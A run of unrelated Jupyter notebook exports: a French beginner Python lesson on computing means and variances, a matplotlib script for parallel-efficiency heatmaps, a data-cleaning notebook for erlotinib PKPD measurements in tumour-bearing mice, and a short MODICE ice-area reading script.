from math import sqrt sd = variance ** 0.5 # standard deviation print(f"L'écart-type est égal à {sd}") 25 ** 0.5 == sqrt(25) tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] poids = [95, 75, 70, 77, 103, 60, 71, 66, 80, 69] for x, y in zip(tailles, poids): print(x) print(y)1.9 95 1.75 75 1.88 70 1.87 77 2.04 103 1.65 60 1.77 71 1.78 66 1.81 80 1.79 69Functionstailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] somme = 0 n = 0 for taille in tailles: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") moyenne(tailles) moyenne(poids)A function is like a block of code that we give a name to.len(tailles) def moyenne(): tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] somme = 0 n = 0 for taille in tailles: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") moyenne() moyenne() moyenne(tailles) def moyenne(donnees): """ Cette fonction calcule la moyenne d'une série de valeurs. """ somme = 0 n = 0 for valeur in donnees: n = n+1 somme = somme + valeur #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}")The function prints the value of the mean but does not return it yet. We cannot assign the value of the mean to a variable.moyenne_tailles = moyenne(tailles) moyenne_tailles def moyenne(donnees): """ Cette fonction calcule la moyenne d'une série de valeurs. """ somme = 0 n = 0 for valeur in donnees: n = n+1 somme = somme + valeur #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n #print(f"La moyenne est {moyenne}") return moyenne moyenne_tailles = moyenne(tailles) moyenne_tailles moyenne tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] n = len(tailles) moyenne_tailles = moyenne(tailles) sommesqEM = 0 for taille in tailles : sqEM = (taille - moyenne_tailles)**2 #print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM #print(f"la somme des carrés des EM est {sommesqEM}") print() variance = sommesqEM / n print(f"la variance est {variance}") # Variance: proposal from Abdoulaye def variance(valeur_variance): somme = 0 n = 0 sommesqEM = 0 for var in valeur_variance: n = n+1 somme = somme + var print() moyenne = somme / n print(f"La moyenne est {moyenne}") print() for var in valeur_variance : sqEM = (var - moyenne)**2 print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM print(f"la somme des carrés des EM est {sommesqEM}") print() variance = sommesqEM / n print(f"la variance est {variance}") variance([1,2,3,4,5,8,7,8]) def variance(valeur_variance:list): """ Cette fonction calcule la variance d'une série de données.
Prend en argument une séquence de valeur """ # Nous calculons n et la moyenne de la liste moyenne_list = moyenne(valeur_variance) # Logique pour calculer la variance # Variance = la moyenne des carrés - le carré de la moyenne carre_valeur_variance = [x**2 for x in valeur_variance] # List comprehension variance_list = moyenne(carre_valeur_variance) - moyenne_list **2 return variance_listNous avons aussi la distribution du poids des étudiants :valeurs = [2,3,4,5,6] [x**2 for x in valeurs] # List comprehension result = [] for x in valeurs: result.append(x**2) result variance(tailles) moyenne(tailles) moyenne([1,2,3,4,5,7,8,9,8,7,8,5,4,5,4,5,4,5,4]) moyenne() poids = [95, 75, 70, 77, 103, 60, 71, 66, 80, 69]Creates Figure 13 based on the .txt runtime info files returned by the MJP-Test.Basically an exact copy of ODERuntimePlots.py file with only the filenames/paths and some constants adapted to the MJP modelimport numpy as np import matplotlib import matplotlib.pyplot as plt import pandas as pd import math import os import seaborn from matplotlib import rc font = {'family' : 'DejaVu Sans', 'weight' : 'normal', 'size' : 12} rc('font', **font) nodelist=np.array([1,2,4,8,16]) workers_per_node = 48 datalist=[] filepath="/home/felipe/testresults/MJP/Juwels" for i in range(len(nodelist)): datalist.append(pd.read_csv( os.path.join(filepath, "MJPruntimeresultsN"+str(nodelist[i])+".txt"), delimiter = ", ", engine = 'python')) data1worker=pd.read_csv(os.path.join(filepath, "MJPruntimeresultsN0.txt"), delimiter = ", ", engine = 'python') pop_sizes = datalist[0].loc[datalist[0]['Look_ahead']==True]['Pop size'].values print(pop_sizes) meanslist = [] for i in range(len(nodelist)): meanslist.append(datalist[i].loc[datalist[0]['Look_ahead']==True]['Runtime Expectation'].values) meanslist.append(datalist[i].loc[datalist[0]['Look_ahead']==False]['Runtime Expectation'].values) nodelist = nodelist * 48 PPParray=np.zeros((len(nodelist),len(pop_sizes))) ORIarray=np.zeros((len(nodelist),len(pop_sizes))) #Statarray=np.zeros((len(nodelist),len(pop_sizes))) for i in range(len(nodelist)): PPParray[i,:]=meanslist[2*i] ORIarray[i,:]=meanslist[2*i+1] # Statarray[i,:]=meanslist[3*i+2] colors=["blue", "orange" ,"red", "yellow", "green", "purple"] #plt.plot(PPParray[0,:],pop_sizes,label=str(nodes[0])+" Cores", marker="o", markersize=5, color=colors[0]) for i in range(0,len(nodelist)): plt.plot(PPParray[i,:],pop_sizes,label=str(nodelist[i])+" W", marker="o", markersize=5, color=colors[i]) plt.plot(ORIarray[i,:],pop_sizes, marker="o", markersize=5, color = colors[i], linestyle="dotted") plt.plot([0],[10], label="Look Ahead", color = "black") plt.plot([0],[10], label="Dynamic", color = "black", linestyle = "dotted") plt.legend() plt.grid(True) plt.yscale('log') plt.ylabel("Population") plt.yticks(pop_sizes,pop_sizes) plt.xscale('log') plt.xlabel("Time") plt.ylim(0.95*pop_sizes[0],1.05*pop_sizes[-1]) plt.tick_params(axis='both', which='major', labelsize=10) plt.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPRuntimeGraphs.pdf") plt.show() pop_sizes_1=pop_sizes[0:-1] means1PPP = data1worker.loc[data1worker['Look_ahead']==True]['Runtime Expectation'].values means1PPP = np.append(means1PPP, 4*means1PPP[-1]) par_efficiency=np.zeros((len(nodelist),len(pop_sizes))) for i in range(0,len(nodelist)): for j in range(0,len(pop_sizes)): par_efficiency[i,j]=means1PPP[j]/(PPParray[i,j]*nodelist[i]) par_efficiency_ori=np.zeros((len(nodelist),len(pop_sizes))) for i in range(0,len(nodelist)): for j in range(0,len(pop_sizes)): 
par_efficiency_ori[i,j]=means1PPP[j]/(ORIarray[i,j]*nodelist[i]) y = np.array([math.sqrt(2),2,4,8,16,32])*48 y1=np.append(48,y) y2=y1[:] kekse=np.zeros((len(nodelist)+1,len(pop_sizes)+1)) kekse[:-1,:-1]=par_efficiency fig, ax = plt.subplots(1,1,figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), kekse, vmin=0, vmax=1) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="N=W") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="N=2W") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="N=10W") plt.xscale('log') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) ax.axis('tight') plt.title('Parallel efficiency - LA') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPLAParallelEff.pdf") plt.show() y = np.array([math.sqrt(2),2,4,8,16,32])*48 y1=np.append(48,y) y2=y1[:] kekse=np.zeros((len(nodelist)+1,len(pop_sizes)+1)) kekse[:-1,:-1]=par_efficiency_ori fig, ax = plt.subplots(1,1,figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), kekse, vmin=0, vmax=1) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="N=W") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="N=2W") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="N=10W") plt.xscale('log') plt.legend(loc = 'upper left') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) ax.axis('tight') plt.title('Parallel efficiency - DYN') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPDYNParallelEff.pdf") plt.show() vmax=None diff = np.zeros((len(nodelist)+1,len(pop_sizes)+1)) diff[:-1,:-1] = par_efficiency-par_efficiency_ori 
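# Editor's note (a sketch, not part of the original script): the quantity plotted here is the usual
# parallel efficiency E = T_1 / (W * T_W), i.e. the single-worker runtime divided by W times the
# runtime on W workers, exactly as computed for par_efficiency above; values close to 1 mean
# near-ideal scaling.
def parallel_efficiency(t_single, t_parallel, n_workers):
    return t_single / (n_workers * t_parallel)
# e.g. parallel_efficiency(100.0, 3.0, 48) is roughly 0.69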
fig, ax = plt.subplots(1,1, figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), diff, vmin=0, vmax=vmax) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="Pop=Nodes") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="Pop=2*Nodes") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="Pop=10*Nodes") plt.xscale('log') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) plt.title('Change in par. efficiency (difference)') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPChangeinParEff.pdf") plt.show() vmax=None frac = np.zeros((len(nodelist)+1,len(pop_sizes)+1)) frac[:-1,:-1] = par_efficiency/par_efficiency_ori fig, ax = plt.subplots(1,1, figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), frac, vmin=1, vmax=vmax) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="Pop=Workers") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="Pop=2*Workers") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="Pop=10*Workers") plt.xscale('log') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) plt.title('Acceleration factor') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPAccelerationFact.pdf") plt.show():6: MatplotlibDeprecationWarning: shading='flat' when X and Y have the same dimensions as C is deprecated since 3.3. Either specify the corners of the quadrilaterals with X and Y, or pass shading='auto', 'nearest' or 'gouraud', or set rcParams['pcolor.shading']. This will become an error two minor releases later. 
im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]),Erlotinib Intermediate Dose Treatment Data: LXF A677 Implanted in MiceIn [1], the tumour growth inhibition (TGI) PKPD model of Erlotinib and Gefitinib was derived from two separate *in vivo* experiments. In particular, the growth of patient-derived tumour explants LXF A677 (adenocarcinoma of the lung) and cell line-derived tumour xenografts VXF A431 (vulva cancer) in mice was monitored. Each experiment comprised a control growth group and three groups that were treated with either Erlotinib or Gefitinib at one of three dose levels. Treatments were orally administered once a day.In this notebook, DESCRIPTION TO BE COMPLETED Raw PK data for all dosing regimens# # Import raw LXF A677 Erlotinib PK data. # import os import pandas as pd # Import LXF A677 PK data path = os.path.dirname(os.getcwd()) # make import independent of local path structure pk_data_raw = pd.read_csv(path + '/data_raw/PK_LXF_erlo.csv', sep=';') # Display data print('Raw PK Data Set for all dosing regimens:') pk_data_rawRaw PK Data Set for all dosing regimens:Raw PD data for all Erlotinib and Gefitinib dosing regimens# # Import raw PD data. # import os import pandas as pd # Import LXF A677 PD data path = os.path.dirname(os.getcwd()) # make import independent of local path structure pd_data_raw = pd.read_csv(path + '/data_raw/PKPD_ErloAndGefi_LXF.csv', sep=';') # Display data print('Raw PD Data Set for all Erlotinib and Gefitinib dosing regimens:') pd_data_rawRaw PD Data Set for all Erlotinib and Gefitinib dosing regimens:Cleaning the dataDISCUSSION TO BE COMPLETEDNeed - ID- Time- Plasma concentration (check whether the value is actually the plasma concentration)- Tumour volume- Body weight- Dose Time- Dose Amount Cleaning the dataWe obtained those datasets from the authors of [1]. There is a lot of information in the datasets that is not relevant for our purposes.All we really need for our analysis is- **ID** indicating which mouse was measured,- **BODY WEIGHT** indicating the weight of the mouse,- **TIME CONC** indicating the time point of each plasma concentration measurement,- **CONC** indicating the measured plasma concentration of the compound,- **TIME VOLUME** indicating the time point of each tumour volume measurement,- **TUMOUR VOLUME** indicating the measured tumour volume,- **DOSE TIME** indicating the time point when the dose was administered,- **DOSE AMOUNT** indicating the amount of the administered dose.It is not straightforward to identify these properties in the dataframes. That is why we detail our mapping in the following and document the reasons for our decisions.- **ID**: Mapping is obvious,- **BODY WEIGHT**: Mapped to **BW** after confirmation from the authors. **BW** measured in $\text{g}$.- **TIME CONC**: **TIME** column in `pk_data_raw`. Time measured in $\text{day}$.- **CONC**: **Y** column in `pk_data_raw` after confirmation from authors. Concentration measured in $\text{mg/L}$.- **TIME VOLUME**: **TIME** column in either `pk_data_raw` or `pd_data_raw`. Time measured in $\text{day}$.- **TUMOUR VOLUME**: **Y** column in `pd_data_raw`.
Tumour measured in $\text{mm}^3$.- **DOSE TIME**: We take the dosing times from the description in the reference [1], due to unfamiliarity with Monolix's conventions.- **DOSE AMOUNT**: We take the dosing times from the description in the reference [1], due to unfamiliarity with Monolix's conventions.The low dose dosing regimen for Erlotinib was an oral dose of $6.25\, \text{mg/kg/L}$ per day from day 3 to 16. According to Roche's study report doses were adjusted throughout the experiment. However, the body weight was only measured on days 0, 2, 4, 7, 9, 11, 14, 16, 18, 21, 23, 25, 28, 30. As a result it may be assumed that the dose, too, was only adjusted when a new measurement of the body weight was obtained, despite being administered daily.NOTE: THE DOSE AMOUNT in the DOSE column DEVIATES from THEORETICAL DOSE. WHY? THERE IS NO DOSE IN ROCHE'S REPORT.Remarks on remaining column keys:- **DOSE**, **ADDL**, **II**: According to Monolix these keys encode the dose amount (DOSE) and the number of additional doses (ADDL) to add, in intervals specified by II. Since we take the doses from the study directly, we don't need those keys.- **YTYPE**, **CENS**: According to Monolix these keys encode the data type (tumour volume in this case) and whether the measured values were subject to censoring. We should make sure that censored data are dealt with accordingly and that only one data type is present in the data set.- **CELL LINE**, **DOSE GROUP**, **DRUG**, **EXPERIMENT**: These customised keys are quite self-explanatory. We should make sure that the data we use is uni-valued in these columns.- **DRUGCAT**: The meaning of this key is less clear. It may refer to the drug category, encoding the route of administration. We should make sure that this column is also only uni-valued. If multiple values occur we need to clarify what this column means.- **BW**: refers to the body weight of the mouse at the time of the measurement.- **KA**, **V**, **KE**, **w0**, **I**: These are customised keys, whose meaning is not immediately clear. They appear to be parameters of the PKPD model. We are interested in inferring parameters ourselves, so we are not interested in any previously obtained parameters, and choose to ignore these columns.For reasons that will become clear later, we will choose to measure the tumour volume in $\text{cm}^3$. Create Erlotinib low dose PKPD dataset# # Create LXF A677 data from raw data set.
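# Editor's aside (illustration only, not from the original notebook): under the assumption stated
# above that the administered dose tracks the most recent body-weight measurement, a nominal
# 6.25 mg/kg dose for a hypothetical mouse of bw_g grams would be
bw_g = 25.0                   # hypothetical body weight in g, for illustration only
dose_mg = 6.25 * bw_g / 1000  # 6.25 mg/kg * 0.025 kg = 0.15625 mg per administration
# (the DOSE column in the raw data deviates from this theoretical value, as noted above)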
# import os import numpy as np import pandas as pd # Get path to directory path = os.path.dirname(os.getcwd()) # make import independent of local path structure # Import LXF A677 Erlotinib PK data pk_data_raw = pd.read_csv(path + '/data_raw/PK_LXF_erlo.csv', sep=';') # Import LXF A677 PD data pd_data_raw = pd.read_csv(path + '/data_raw/PKPD_ErloAndGefi_LXF.csv', sep=';') # Make sure that data is stored as numeric data pk_data = pk_data_raw.apply(pd.to_numeric, errors='coerce') pd_data = pd_data_raw.apply(pd.to_numeric, errors='coerce') # Mask PD data for Erlotinib treatment (DRUG 1) pd_data = pd_data[pd_data['DRUG'] == 1] # Mask for the low dose group (DOSE GROUP 6.25) pk_data = pk_data[pk_data['DOSE GROUP'] == 25.0] pd_data = pd_data[pd_data['DOSE GROUP'] == 25.0] # Sort dataframes according to measurement times pk_data.sort_values('TIME', inplace=True) pd_data.sort_values('TIME', inplace=True) # Assert that there is an equal number of mice with tumour volume and concentration measurements assert len(pk_data['#ID'].unique()) == len(pd_data['#ID'].unique()) # Assert that the mice in both datasets are the same assert np.array_equal(np.sort(pk_data['#ID'].unique()), np.sort(pd_data['#ID'].unique())) # Get dose relevant columns and rows from dataframes (needed to reconstruct dosing schedule further down) pk_dose_data = pk_data[~pk_data['DOSE'].isnull()][['#ID', 'TIME', 'DOSE', 'BW']] pd_dose_data = pd_data[~pd_data['DOSE'].isnull()][['#ID', 'TIME', 'DOSE', 'BW']] # Filter out DOSE entries (we compute those independently) pk_data = pk_data[pk_data['DOSE'].isnull()] pd_data = pd_data[pd_data['DOSE'].isnull()] # Assert that for each mouse the tumour volumes and body weights at a given time point agrees across the two datasets for mouse_id in pk_data['#ID'].unique(): # Create mask for mouse pk_mask = (pk_data['#ID'] == mouse_id) & pk_data['Y'].isnull() pd_mask = pd_data['#ID'] == mouse_id # Assert that times are the same assert np.array_equal(pk_data[pk_mask]['TIME'], pd_data[pd_mask]['TIME']) # Assert that tumour volumes are the same assert np.array_equal(pk_data[pk_mask]['TUMOR SIZE'], pd_data[pd_mask]['Y']) # Assert that body weights agree assert np.array_equal(pk_data[pk_mask]['BW'], pd_data[pd_mask]['BW']) # Initialise final dataframe from PD dataframe and forget about all columns but #ID, TIME, Y and BW data = pd_data[['#ID', 'TIME', 'Y', 'BW']] # Rename TIME to TIME VOLUME in day data = data.rename(columns={'TIME': 'TIME VOLUME in day'}) # Rename Y to TUMOUR VOLUME in cm^3 and convert from mm^3 to cm^3 data = data.rename(columns={'Y': 'TUMOUR VOLUME in cm^3'}) data['TUMOUR VOLUME in cm^3'] *= 10E-03 # Rename BW to BODY WEIGHT in g data = data.rename(columns={'BW': 'BODY WEIGHT in g'}) # Extract #ID, TIME, Y and BW from PK data conc_data = pk_data[['#ID', 'TIME', 'Y', 'BW']] # Filter only for those rows with non-nan entries conc_data = conc_data[~conc_data['Y'].isnull()] # Rename TIME to TIME CONC in day conc_data = conc_data.rename(columns={'TIME': 'TIME CONC in day'}) # Rename Y to CONC in mg/L and convert from ng/L to mg/L conc_data = conc_data.rename(columns={'Y': 'CONC in mg/L'}) conc_data['CONC in mg/L'] *= 1E-03 # Rename BW to BODY WEIGHT in g conc_data = conc_data.rename(columns={'BW': 'BODY WEIGHT in g'}) # Add concentration data to final dataframe data = pd.concat([data, conc_data]) # Define dosing time points in day dose_times = [3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0] # Assert that mice in dose dataframes are the same as in the final data 
frame assert np.array_equal(np.sort(pk_dose_data['#ID'].unique()), np.sort(data['#ID'].unique())) assert np.array_equal(np.sort(pd_dose_data['#ID'].unique()), np.sort(data['#ID'].unique())) # Initialise dose dataframe based on pk dataframe dose_data = pk_dose_data # Get dose from dataframe TODO: CHECK WHY ENTRIES DEVIATE FROM THEORETICAL VALUES for mouse_id in data['#ID'].unique(): # Create mask for mouse and filter out NaN dose entries pk_mask = (pk_dose_data['#ID'] == mouse_id) pd_mask = (pd_dose_data['#ID'] == mouse_id) # Check that DOSE entries agree across datasets assert np.array_equal(pk_dose_data[pk_mask]['DOSE'], pd_dose_data[pd_mask]['DOSE']) # Add dose amount to data frame for each dose event for time_id, time in enumerate(dose_times): # Mask dataframe for time mask = (dose_data['#ID'] == mouse_id) & (dose_data['TIME'] == time) # If first dose is empty raise an error if dose_data[mask]['DOSE'].empty & (time == dose_times[0]): raise ValueError # Else if dose is empty and not the first dose, fill with previous dose # (Assume that dose has not been altered) elif dose_data[mask]['DOSE'].empty: # Create mask for previous time point mask = (dose_data['#ID'] == mouse_id) & (dose_data['TIME'] == dose_times[time_id-1]) # Append dose to container dose_data = dose_data.append( pd.DataFrame({ '#ID': mouse_id, 'TIME': time, 'DOSE': dose_data[mask]['DOSE'], 'BW': dose_data[mask]['BW']}), ignore_index=True) else: # Assert that there is only one entry per time point assert len(dose_data[mask]['DOSE']) == 1 # Sort dataframes according to measurement times dose_data.sort_values('TIME', inplace=True) # Rename TIME to TIME DOSE dose_data = dose_data.rename(columns={'TIME': 'TIME DOSE in day'}) # Rename DOSE to DOSE AMOUNT and convert from ng to mg dose_data = dose_data.rename(columns={'DOSE': 'DOSE AMOUNT in mg'}) dose_data['DOSE AMOUNT in mg'] *= 1E-03 # Rename BW to BODY WEIGHT dose_data = dose_data.rename(columns={'BW': 'BODY WEIGHT in g'}) # Add dose data to final dataframe data = pd.concat([data, dose_data]) # Display final Erlotinib low dose dataset print('Low dose Erlotinib dataset LXF A677:') dataLow dose Erlotinib dataset LXF A677:Illustrate Erlotinib low dose dataWe use [plotly](https://plotly.com/python/) to create interactive visualisations of the time-series data.def compute_cumulative_dose_amount(times, doses, end_exp, duration=1E-03, start_exp=0): """ Converts bolus dose amounts to a cumulative dose amount series that can be plotted nicely. Optionally the start and end of the experiment can be provided, so a constant cumulative amount is displayed for the entire duration experiment. """ # Get number of measurements n = len(times) # Define how many cumulative time points are needed (add start and end if needed) m = 2 * n + 2 # Create time container cum_times = np.empty(shape=m) # Create dose container cum_doses = np.empty(shape=m) # Add first entry (assuming no base level drug) cum_times[0] = 0 cum_doses[0] = 0 cum_doses[1] = 0 # At start of first dose there will also be no drug # Add start and end time of dose to container cum_times[1:-2:2] = times # start of dose cum_times[2:-1:2] = times + duration # end of dose cum_times[-1] = end_exp # Add cumulative dose amount at start and end of dose to container cum_doses[3:-2:2] = np.cumsum(doses[:-1]) # start of doses (except first dose, dealt with above) cum_doses[2:-1:2] = np.cumsum(doses) # end of doses cum_doses[-1] = np.cumsum(doses)[-1] # final dose level return cum_times, cum_doses # # Visualise Erlotinib low dose data growth data. 
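# Editor's aside (illustration only, not part of the original notebook): for a toy dosing schedule,
# compute_cumulative_dose_amount returns a step-like cumulative series, e.g.
demo_times, demo_doses = compute_cumulative_dose_amount(
    times=np.array([3.0, 4.0]), doses=np.array([0.1, 0.2]), end_exp=30)
# demo_times -> [0, 3, 3.001, 4, 4.001, 30] and demo_doses -> [0, 0, 0.1, 0.1, 0.3, 0.3],
# i.e. the cumulative amount jumps at each dose and is then held constant until day 30.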
# # This cell needs the above created dataset: # [data] # import pandas as pd import plotly.colors import plotly.graph_objects as go from plotly.subplots import make_subplots # Get number of individual mice n_mice = len(data['#ID'].unique()) # Define colorscheme colors = plotly.colors.qualitative.Plotly[:n_mice] # Create figure fig = make_subplots(rows=3, cols=1, shared_xaxes=True, row_heights=[0.2, 0.4, 0.4], vertical_spacing=0.05) # Scatter plot of concentration and tumour growth data for index, mouse_id in enumerate(np.sort(data['#ID'].unique())): # Mask dataset for mouse mask = data['#ID'] == mouse_id mouse_data = data[mask] # Get concentration measurement times conc_times = mouse_data['TIME CONC in day'].to_numpy() # Get measured concentrations conc = mouse_data['CONC in mg/L'].to_numpy() # Get tumour volume measurement times volume_times = mouse_data['TIME VOLUME in day'].to_numpy() # Get measured concentrations volumes = mouse_data['TUMOUR VOLUME in cm^3'].to_numpy() # Get dosing time points dose_times = mouse_data['TIME DOSE in day'].to_numpy() # Get doses doses = mouse_data['DOSE AMOUNT in mg'].to_numpy() # Filter nans from dose arrays dose_times = dose_times[~np.isnan(dose_times)] doses = doses[~np.isnan(doses)] # Convert dose events to cumulative dose amount time series dose_times, doses = compute_cumulative_dose_amount( times=dose_times, doses=doses, end_exp=30) # Plot cumulative dosed amount fig.add_trace( go.Scatter( x=dose_times, y=doses, legendgroup="ID: %d" % mouse_id, name="ID: %d" % mouse_id, showlegend=False, hovertemplate= "Cumulative dose in mg
" + "ID: %d
" % mouse_id + "Time: %{x:.0f} day
" + "Tumour volume: %{y:.02f} cm^3
" + "", mode="lines", line=dict(color=colors[index])), row=1, col=1) # Plot concentration data fig.add_trace( go.Scatter( x=conc_times, y=conc, legendgroup="ID: %d" % mouse_id, name="ID: %d" % mouse_id, showlegend=False, hovertemplate= "Plasma Concentration in mg/L
" + "ID: %d
" % mouse_id + "Time: %{x:.0f} day
" + "Plasma concentration: %{y:.02f} mg/L
" + "", mode="markers", marker=dict( symbol='circle', opacity=0.7, line=dict(color='black', width=1), color=colors[index])), row=2, col=1) # Plot tumour volume data fig.add_trace( go.Scatter( x=volume_times, y=volumes, legendgroup="ID: %d" % mouse_id, name="ID: %d" % mouse_id, showlegend=True, hovertemplate= "Tumour volume in cm^3 %s
" + "ID: %d
" % mouse_id + "Time: %{x:} day
" + "Tumour volume: %{y:.02f} cm^3
" + "", mode="markers", marker=dict( symbol='circle', opacity=0.7, line=dict(color='black', width=1), color=colors[index])), row=3, col=1) # Set figure size fig.update_layout( autosize=True, template="plotly_white") # Set X axis label fig.update_xaxes(title_text=r'$\text{Time in day}$', row=3, col=1) # Set Y axes labels fig.update_yaxes(title_text=r'$\text{Amount in mg}$', row=1, col=1) fig.update_yaxes(title_text=r'$\text{Conc. in mg/L}$', row=2, col=1) fig.update_yaxes(title_text=r'$\text{Tumour volume in cm}^3$', row=3, col=1) # Add switch between linear and log y-scale fig.update_layout( updatemenus=[ dict( type = "buttons", direction = "left", buttons=list([ dict( args=[{ "yaxis2.type": "linear", "yaxis3.type": "linear"}], label="Linear y-scale", method="relayout" ), dict( args=[{ "yaxis2.type": "log", "yaxis3.type": "log"}], label="Log y-scale", method="relayout" ) ]), pad={"r": 0, "t": -10}, showactive=True, x=0.0, xanchor="left", y=1.15, yanchor="top" ), ] ) # Show figure fig.show()**Figure 1:** TO BE COMPLETED Export cleaned data# # Export cleaned data sets for inference in other notebooks. # # This cell needs the above created dataset # import os import pandas as pd # Get path of current working directory path = os.getcwd() # Export cleaned LXF A677 control growth data data.to_csv(path + '/data/erlotinib_intermediate_dose_lxf.csv')MODICE v04 area by GRACE mascon, 2000-2014import glob import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np import pandas as pd %pylab inline files = glob.glob("mascons/*area.txt") files import re def read_mascon_data(mascon,filename): df = pd.read_csv( filename, delim_whitespace=True, index_col=0 ) df.head() df = df[['MODICE_area_km^2','MODICE_NS_km^2']] df.columns = [ mascon + '_modice', mascon + '_ns'] return df p = re.compile('MOD44W.([\+\w]+).area') data = [] for file in files: mascon = p.findall(file) print "next file: " + file df = read_mascon_data( mascon[0], file ) data.append(df) df = pd.concat(data, axis=1) dfGet all modice columns (except the one with Greenland, since it's so much larger than the rest)modice_cols = [col for col in df.columns if 'modice' in col] modice_cols.remove('Greenland_modice') df_modice = df[modice_cols] 